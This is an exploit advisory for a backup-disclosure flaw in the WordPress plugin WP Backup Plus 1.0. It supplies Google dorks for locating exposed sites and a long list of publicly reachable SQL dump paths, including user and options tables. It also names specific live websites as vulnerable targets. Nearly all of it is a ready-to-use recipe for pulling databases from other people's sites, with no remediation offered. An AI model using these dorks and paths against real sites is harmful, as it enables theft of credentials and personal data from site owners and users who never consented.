WordPress WP Backup Plus + plugin version 1.0 suffers from a database disclosure vulnerability.
b4b6a29dfc7274fbd4c2a06152298f15
#################################################################################################
# Exploit Title : WordPress WP Backup Plus + 1.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Vendor Homepage : wpbackupplus.com ~ wplaunchpad.io ~ wordpress.org
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''
# Exploit Risk : Medium
# Version Information : 1.0
# Google Dorks : inurl:''/wp-content/uploads/wp-backup-plus/temp/''
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110143
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2245
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31472
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/uploads/wp-backup-plus/temp/database.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql
/wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_comments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql
/wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql
/wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql
/wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql
/wp-content/uploads/wp-backup-plus/temp/wp_terms.sql
/wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20v
IjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vI
jtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip.log
#################################################################################################
# Example Vulnerable Sites =>
[+] wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
[+]
curtiswrightoutfitters.com/wp-content/uploads/wp-backup-plus/temp/database.sql
[+] wpbackupplus.com/wp-content/uploads/wp-backup-plus/temp/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################